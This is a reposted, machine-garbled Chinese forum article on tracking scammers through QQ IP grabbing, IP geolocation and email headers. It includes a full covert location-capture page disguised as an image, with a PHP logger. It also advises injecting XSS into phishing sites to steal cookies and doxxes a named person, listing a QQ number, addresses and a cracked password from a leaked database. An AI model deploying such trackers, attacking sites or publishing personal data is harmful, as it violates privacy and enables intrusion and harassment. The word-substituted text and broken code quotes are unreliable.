为了写好这篇文章,列了一个大纲,比拟来看,会比较随意马虎看
因篇幅较长,以是打算分成两篇来写
互换群:689194365混子误入
第一篇:QQ定位+ip定位+常见钓鱼方法及反击+诱骗模式
第二篇:诱骗生理学+行为习气+常见木马诱骗及反击+另类工具利用擒获幕后黑手
0x01
QQ定位:
QQ2009绿色显IP复活版,现在这一个用的比较少了,有时候获取不到别人的ip
相对付利用插件的比较多,用过插件给别人发送一条带有xml的图片,对方只要看了这张图片90%的几率能获取到ip
如果嫌插件或其他软件不屈安,你也可以用wireshark来单向获取QQ好友的ip
Wireshark用起来很大略,不做过多阐述,想看的话推举两篇文章,讲得很详细,如果再看不懂不会操作,我也没办法
http://www.cnblogs.com/Oran9e/p/7098097.html
http://www.freebuf.com/articles/web/137952.html
这时才PC端操作的,当然除了pc端还有在移动真个,比如在github上有一套源码
https://github.com/PrintNow/QQipTance
通过变色龙搭建起的APP是这个样的
只要发到群里就能获取全部在线成员的ip,也可以发给单个的qq好友,之前搭建了一个免费版的,由于是免费版的,变色龙的广告插得满天飞,后来也就关了,感兴趣的可以自己搭建起来自己用,对付骗子,一定一个准
然后再去找接口,输入ip进行大致定位
接口1:https://www.chaidu.com/App/Web/IP/
接口2:http://www.ipip.net/ip.html
接口3:http://www.hao7188.com/
接口4:https://www.opengps.cn/Data/IP/LocHighAcc.aspx
接口5:https://ip.rtbasia.com/
接口6:https://www.opengps.cn/Data/IP/LocHighAcc.aspx
接口7:http://www.ipplus360.com/
上面说的几种方法,是通过QQ来定位对方的地址,如果碰着诱骗的多数是通过QQ来履行诱骗的,学会上面的方法99%能捉住对方ip地址
其余,再说一下通过网站定位,这个可以分为两个方法定位
1、获取对方访问IP定位
2、获取对方经度纬度来定位
先说通过经纬度定位,供应以下PHP代码,搭建起来放进网站根目录即可
先知发过定位文件,该当是咱们的指尖表哥写的,社区该当也没,没仔细找
<!DOCTYPE html>
<head>
<meta charset=\"大众UTF-8\"大众>
<title>Document</title>
</head>
<body>
<img src=\公众1.png\公众 alt=\"大众\"大众 width=\"大众100%;\"大众>
<script>
var geol;
try {
if (typeof(navigator.geolocation) == 'undefined') {
geol = google.gears.factory.create('beta.geolocation');
} else {
geol = navigator.geolocation;
}
} catch (error) {
//alert(error.message);
}
if (geol) {
geol.getCurrentPosition(function(position) {
var nowLatitude = position.coords.latitude;
var nowLongitude = position.coords.longitude;
//以上是固定代码,获取经度纬度
alert(\公众纬度:\"大众 + nowLatitude + \"大众, 经度:\"大众 + nowLongitude); //弹出经度纬度的坐标
function new_form(){
var f=document.createElement(\"大众form\公众);
document.body.appendChild(f);
f.method=\"大众post\公众;
return f;
} //定义函数,创建form
function create_elements(eForm,eName,eValue){
var e=document.createElement(\公众input\"大众);
eForm.appendChild(e);
e.type=\"大众text\"大众;
e.name=eName;
if(!document.all){e.style.display=\"大众none\"大众}else{
e.style.display=\"大众block\公众;
e.style.width=\"大众0px\"大众;
e.style.height=\"大众0px\"大众;
}
e.value=eValue;
return e;
}
//这段代码意思便是 定义方法,有两个input 他们的值分别是经度纬度的值
var _f=new_form();
create_elements(_f,\公众username\"大众,nowLatitude) // 创建form中的input工具
create_elements(_f,\公众password\公众,nowLongitude);
_f.action=\"大众geolocation2.php\"大众;
_f.submit(); //提交
//表单自提交发送到geolocation2.php页面
}, function(error) {
switch(error.code){
case error.TIMEOUT :
//alert(\"大众连接超时,请重试\公众);
break;
case error.PERMISSION_DENIED :
//alert(\"大众您谢绝了利用位置共享做事,查询已取消\"大众);
break;
case error.POSITION_UNAVAILABLE :
//alert(\"大众非常抱歉,我们暂时无法通过浏览器获取您的位置信息\公众);
break;
}
}, {timeout:10000}); //设置十秒超时
}
//设置连接超时的报错
</script>
</body>
</html>
geolocation2.php 的代码
<?php
@$time=date('Y-m-d H:i:s',time()); //获取当前韶光
$nowLatitude=\公众纬度 \"大众.$_POST['username']; //接管上个页面传过来的参数(经度坐标)
$nowlongitude=\公众经度 \公众.$_POST['password'].\"大众 ------韶光是\"大众.$time.\公众\r\n\"大众;; //接管上个页面传过来的参数(纬度坐标)
$fp=fopen(\"大众geo.txt\"大众, \"大众a+\"大众); //创建一个geo.txt文件
fwrite($fp, $nowLatitude); //把经度写入到geo.txt里
fwrite($fp, $nowlongitude); //把纬度写入到geo.txt里
?>
这一串php代码是对方点击授权之后拿到对方的经度纬度,然后通过经纬度来查找位置,这个比IP定位要答应多,毕竟IP分配的是区域。缺陷便是很多人潜意识里都会点谢绝的,以是怎么办看个人想法了,主要的不是方法是脑筋
查询网址:http://www.gpsspg.com/maps.htm
季雨林在博客里说的这段比较普通的事理http://blog.csdn.net/cuitang1031/article/details/52727534
这些高精度IP定位事情事理是:
1,用户手机里安装了百度的做事,比如百度舆图SDK
2,用户手机运行了百度的做事,比如利用百度舆图进行导航,公交查询等等过程,都会让百度的做事运行起来
3,百度供应做事的同时,将当前的坐标,跟ip地址数据,当前韶光,定位办法,wifi信息,移动联通电信等运营商的基站信息,传送给百度的后台做事器中
后台做事器留存了这些数据,然后也用这些数据给用户返回了用户须要的内容。这个过程也便是百度的匿名采集信息过程。用户利用前一定都是容许了百度可以利用这些匿名数据
4,百度供应了做事同时,自己网络了匿名数据。而这些数据中。包括ip和gps的对照数据
5,利用这些数据,就可以打算出一个ip曾经在那些范围被利用过,从而得到一个精确的范围数据,这个范围的中央点,就被认为是最靠近用户的地点。同时会把偏差半径也打算出来,于是有了我的这个高精度IP定位功能
所有说你用的方法跟警察叔叔用的定位low多了,不要被电影里面给坑了
其他解释:利用该做事,紧张是针对有线宽带下利用了wifi的用户,精确度会高很多。如果是联通这种直接给客户分配公网ip的有线网路运营商,定位精度可以达到几十米的级别
但是用手机网络2,3,4G网络获取的ip来定位,则可能覆盖全体省。由于其上网机制实质是一个地区用一个ip池,给这个地区代理上网,因此手机网络的ip定位精度会很低。
你假如还不睬解话就看下面这段,季雨林在csdn博客里说的这段
1,手机里的app,能获取位置数据
2,手机里的app,能够通过公网与后台做事器交互。
3,手机有可能是连接了wifi,此时所利用的是家庭宽带的网络
4,如果利用了家庭宽带网络,那么有可能这个家庭宽带的网络具备公网IP到户性子,也便是说家里的路由器获取了公网ip地址,这个地址不是192.168.xx开头,也不是10.xxx开头,还不是172.xxx开头。这时候后台所获取的ip和gps坐标,精度就非常高。最高精度定义为30m,也便是普通家用wifi最大能覆盖的圆形直径。
5,如果利用了家庭宽带网络,可能运营商IP资源不敷,进行了叫做NAT转发的技能。这时候可能得到的便是10.xxx开头的一个内网地址,而真正的公网ip的位置在这个覆盖区域内的某个地方,这时候,这个手机提交的ip和gps坐标数据就有偏差。而这个偏差,是同一个局域网网段下的其他手机所供应,这样以来,便是覆盖一个街道,一个城市,乃至一个省的情形
6,如果手机利用的是手机卡的GPRS流量上网,则肯定是经由了NAT的网络构造。海内的运营商每每是一个省有一个IP池,随机的用来得用户的手机转发上网,这个情形,就涌现了一个省单位范围的很多手机上报的ip和gps坐标的对照,均匀一下,范围就非常大。
7,在说说高精度IP查不到位置的情形:没有位置做事功能的设备在这个IP下利用过。比如,openGPS.cn站点发布在阿里云的青岛节点的ECS上。站长从来没有在这台做事器利用过代理功能,流量始终是这个做事器自己所占用。这时候,由于没有这种具备获取位置功能的手机等设备上报位置,因此就查询不到结果。
实在这些事理不懂也没紧要,你知道会用能找到就行,就很可以的,顺藤摸瓜,连续下面的信息深入
说完QQ定位,再来看微信定位,微信定位该当很多人都不会,但是方法思路都是差不多的
借用微信小程序“群玩助手”
给别人发个小程序,就说是红包,80%的人都回去点开吧
邮箱ip查找
这个很多人不会陌生吧,在公司,险些不会利用QQ来互换,一样平常都是用邮箱互发邮件的,有的钓鱼者邮件以假乱真,很难区分,不如利用域名https://www.ba1du.com/ www.ic0uld.com ,足够以假乱真了,在判断出域名是否是本公司的域名,或者利用假造的域名时候,如果上当受骗溯源的话,就用到了邮箱ip查找
详细履行方法:
比如这一封
我特么小学生啊,每天没玩的给我发这个,
找到ip之后,114.253.35.150 用之前的ip接口去找这个地址
0x02
网络钓鱼
无非就这几种:QQ空间、淘宝退款、银行页面、财付通、邮箱、伪基站、iPhone钓鱼
对付这种QQ空间钓鱼,直接快捷登录,不要输入QQ账号和密码是最大略的,这样钓鱼者就不会拿到你的密码
淘宝退款、银行页面、财付通、邮箱这几种都很类似了,社区里很多人都搞过,精髓便是见框就插,插到xss,用xss平台打cookie进后台,找钓鱼者的ip,定位交110,再便是通过whios查询,进行社工主机域名商,假造源主人的信息,获取邮箱,合营社工库进邮箱,90%就能搞下钓鱼者了
最常见的莫非便是
伪基站+银行钓鱼,这个相信每个人都收到过类似的短信,什么年代了,还会相信银行积分优惠啊,还差那几十块钱吗?由于几十块的小便宜把自己几个月的积蓄搭进去,只能说,让你贪便宜,活该!
!
!
iPhone钓鱼一样平常是搞到你邮箱发送钓鱼链接
相似度极高,但是安全性极低,往上很多公开的漏洞,搞进去
这些骗子也真的是智商低,能不能用的高科技来犯罪
实例看一个钓鱼站,在线刷qq币,真特么这种傻子还有啊?有,肯定有,不止一个
相似度极高,但是安全性极低,往上很多公开的漏洞,搞进去
这些骗子也真的是智商低,能不能用的高科技来犯罪
实例看一个钓鱼站,在线刷qq币,真特么这种傻子还有啊?有,肯定有,不止一个
可拉倒吧,老子学过ps ,零不还是随便p的嘛
通过搜索邮箱,找到一个博客,下面带了两个链接,打开第二个
嗯哼,溜溜溜,不但搞诱骗,骗小学生刷Q币,还菠菜呢,可以可以的
名字:zhengbintao
找到这个信息
全名:郑斌涛
点击去创造有QQ联系办法
Qq:895015400
详细地址:中国福建武平县西安未央区
这该当是几年前的地址,还有一个地址是陕西西安
感激TT表哥帮助查的裤子
384a9052d69ff09ccf8c7314d52fd510 解密:qaz963
这里可以有一种思路是whios查询到的是阳光互联注册的,去社做事商。再或者连续看看有什么信息,加上QQ去套路一波,地址就得手了,至于犯罪证据,那个赌钱网站绝对能让他进去了,就看妖妖灵的警察叔叔们会不会甩锅了
0x03
诱骗模式
诱骗模式分为撒网诱骗、定向诱骗、针对诱骗
顾名思义,撒网诱骗便是在网络上发布诱骗,愿者中计,骗到一个是一个,这种一样平常都是傻子。定向诱骗,紧张是对老年人、学生党、以及在职员工,网购者等等,比如,骗老年人买保健品,屋子抵押收红利,学生党一样平常便是兼职,伪装亲朋好友,救助金,补助金,供应银行卡号,然后以资金到账查询为由,指令其在自动取款机上进入英文界面操作,将钱转走。对在职员工便是伪装领导诱骗,哀求为某某公司转账,而针对诱骗,一样平常是针对的比较富有的人,负责研究其工具行为习气,生活模式,思维办法,而专门研究出来的手段。
法律是保护强者的,只有懂法才能用法--《刑法》、《网络安全法》
所有被骗的90%是由于自己的贪婪
末了的末了,此文纯属本人腻想,如有搪突的地方别来砍我,初衷是保护那些思想纯挚的不要受这个社会险恶的欺骗
本文作者:z7788520,转载自:https://bbs.ichunqiu.com/thread-31584-1-1.html